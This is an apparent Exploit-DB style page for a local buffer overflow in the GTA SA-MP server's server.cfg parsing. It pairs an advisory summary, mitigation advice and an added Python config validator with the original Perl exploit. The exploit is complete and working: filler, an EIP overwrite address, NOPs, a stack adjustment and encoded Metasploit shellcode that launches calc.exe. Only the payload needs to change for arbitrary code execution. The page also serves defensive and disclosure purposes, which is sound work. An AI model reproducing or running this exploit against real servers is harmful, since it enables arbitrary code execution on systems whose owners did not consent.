Vendor: Grand Theft Auto: SA-MP
By: Silent_Dream
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Grand Theft Auto: SA-MP
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:rockstargames:grand_theft_auto:sa-mp
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3, Windows 7
Year: 2011

GTA SA-MP server.cfg Local Buffer Overflow Vulnerability

This exploit takes advantage of a buffer overflow in the way the GTA SA-MP game server parses its server.cfg file. An attacker who can overwrite that file with a specially crafted payload can execute arbitrary code on the server host; because the trigger is a file in the server's own working directory, the vulnerability is local. The exploit uses an EIP overwrite (the binary is compiled with SafeSEH, so a SEH-based approach was not available) and has a maximum payload space of 392 bytes, beyond which the SEH chain is reached. There are 3 bad characters: 0x1a, 0x0d, 0x0a. Triggering the exploit crashes the server and launches the Windows calculator as a proof of concept. The exploit has been tested on Windows XP SP3 and Windows 7.

Mitigation:

To mitigate this vulnerability, it is recommended to update the GTA SA-MP game server software to a patched version that addresses the buffer overflow issue. Additionally, it is important to regularly apply security updates and patches to the server's operating system to minimize the risk of exploitation.
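A practical interim control, given that the advisory lists no patch, is to sanity-check server.cfg before the server process is started. The advisory says the overflow is reached through a single over-long config line (hundreds of bytes of filler) carrying raw machine code, so a legitimate file should contain neither lines of that length nor non-printable bytes. The following Python script is an added example written for this page, not code from the advisory or the SA-MP project; the 200-byte line limit and the sample config contents are assumptions constructed for the illustration.

```python
"""
Pre-start sanity check for a SA-MP server.cfg (added example, not the
advisory's or the project's code).  Two heuristics derived from the advisory:
  * an option line far longer than any legitimate setting (the trigger needs
    hundreds of bytes of filler before the saved return address is reached);
  * non-printable bytes, which a text config never needs but machine code does.
MAX_LINE is an assumption: well below the advisory's 379-byte filler, well
above any real server.cfg option.
"""
import string
import sys

MAX_LINE = 200                               # assumption, see docstring
PRINTABLE = set(string.printable.encode())   # ASCII text, digits, punctuation, whitespace


def check_server_cfg(data: bytes, max_line: int = MAX_LINE) -> list:
    """Return one finding dict per suspicious line; an empty list means the file looks sane."""
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")             # tolerate CRLF line endings
        if len(line) > max_line:
            findings.append({"line": lineno, "reason": "overlong", "length": len(line)})
        bad = sorted({b for b in line if b not in PRINTABLE})
        if bad:
            findings.append({"line": lineno, "reason": "non-printable", "bytes": bad})
    return findings


def file_is_safe(path: str) -> bool:
    """Convenience wrapper for a start-up script: True only if no findings."""
    with open(path, "rb") as fh:
        return not check_server_cfg(fh.read())


# Constructed sample data (not taken from any real server): a normal config,
# and the same config followed by a line shaped like the advisory's trigger
# (long filler plus raw bytes), without any actual payload.
SAMPLE_GOOD = b"echo Executing Server Config...\r\nport 7777\r\nmaxplayers 50\r\n"
SAMPLE_BAD = SAMPLE_GOOD + b"echo " + b"A" * 379 + b"\x00\x01\x02" + b"\x90" * 12 + b"\r\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. python check_cfg.py server.cfg && samp-server.exe
        sys.exit(0 if file_is_safe(sys.argv[1]) else 1)
    for name, blob in (("good", SAMPLE_GOOD), ("bad", SAMPLE_BAD)):
        result = check_server_cfg(blob)
        print(name, "OK" if not result else result)
```

Run with a path to refuse to start the server on a bad config (non-zero exit status), or with no arguments to see the two constructed samples evaluated. The check is a coarse guardrail against this specific trigger shape, not a replacement for a fixed parser, and it does nothing about the underlying missing bounds check in the server.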

Exploit-DB raw data:

# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)
# Date: 9-26-11
# Author: Silent_Dream
# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip
# Tested on: XP SP3, Windows 7
# Thanks to: corelanc0d3r & team, Metasploit, Exploit-db.

#No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead.
#392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a.

#Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator!

my $file = "server.cfg"; #file must be named server.cfg for bug to trigger.
my $head = "echo "; #probably not needed, tweak if you want.
my $junk = "\x41" x 379;
my $eip = "\xaa\x9f\x42\x00"; #push esp/ret in samp-server.exe
my $nops = "\x90" x 12;
my $adjust = "\x81\xc4\x54\xf2\xff\xff"; #add esp, -3500

my $shellcode =
#x86/shikata_ga_nai succeeded with size 227 (iteration=1) 
#Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a' 

"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" .
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" .
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" .
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" .
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" .
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" .
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" .
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" .
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" .
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" .
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" .
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" .
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" .
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" .
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" .
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" .
"\x5e\xa4\xb4";

open(my $File, '>', $file) or die "Cannot write $file: $!";
binmode($File); #write the bytes untouched; Windows text mode would otherwise translate them.
print $File $head.$junk.$eip.$nops.$adjust.$shellcode;
close($File);